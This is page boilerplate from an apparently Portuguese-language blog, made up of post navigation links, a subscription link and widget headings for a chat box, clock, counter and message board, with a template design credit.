Postagens mais recentes
Postagens mais antigas
Início

Assinar: Postagens (Atom)

Chat

 
Get your own Chat Box!
Go Large!


Relogio


Parceiros



Contador



Mural de Recados


 


Design by Ferramentas para blog , suporte by blogtools